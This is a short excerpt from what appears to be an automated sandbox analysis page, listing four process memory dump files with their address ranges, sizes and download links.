memory/5956-282-0x0000000005ED0000-0x00000000063FC000-memory.dmp

Filesize
5.2MB

Download
memory/5956-279-0x0000000000570000-0x00000000005AC000-memory.dmp

Filesize
240KB

Download
memory/5956-280-0x0000000004C50000-0x0000000004C62000-memory.dmp

Filesize
72KB

Download
memory/6920-29565-0x0000000010000000-0x0000000010114000-memory.dmp

Filesize
1.1MB

Download